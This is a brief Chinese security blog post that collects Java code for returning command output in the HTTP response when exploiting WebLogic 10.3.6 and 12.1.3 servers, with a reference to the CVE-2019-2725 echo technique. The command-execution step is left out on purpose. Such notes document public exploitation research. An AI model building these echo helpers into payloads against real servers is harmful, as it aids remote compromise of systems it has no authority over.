整理一下weblogic回显的代码

这些回显的路径与取值是市面上已经公开的，此文是为了补充前几天所说的jetty的中间件回显。

提供的代码只是提供了回显的路径，并没有加上runtime，这块请自行添加。

weblogic10.3.6

1 String lfcmd = ((weblogic.servlet.internal.ServletRequestImpl)((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()).getHeader("lfcmd");
2 weblogic.servlet.internal.ServletResponseImpl response = ((weblogic.servlet.internal.ServletRequestImpl)((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()).getResponse();
3 weblogic.servlet.internal.ServletOutputStreamImpl outputStream = response.getServletOutputStream();
4 outputStream.writeStream(new weblogic.xml.util.StringInputStream(lfcmd));
5 outputStream.flush();
6 response.getWriter().write("");

weblogic12.1.3

1 java.lang.reflect.Field field = ((weblogic.servlet.provider.ContainerSupportProviderImpl.WlsRequestExecutor)this.getCurrentWork()).getClass().getDeclaredField("connectionHandler");
2 field.setAccessible(true);
3 HttpConnectionHandler httpConn = (HttpConnectionHandler) field.get(this.getCurrentWork());
4 httpConn.getServletRequest().getResponse().getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream("xxxxxx"));

其实这块代码在2725的回显里已经被人提出，我是搬运过来记录整理。

原文见：https://xz.aliyun.com/t/5299#toc-9

posted @ 2020-04-29 16:11 ph4nt0mer 阅读(981) 评论(0) 编辑收藏举报

刷新页面返回顶部

ph4nt0mer

整理一下weblogic回显的代码

公告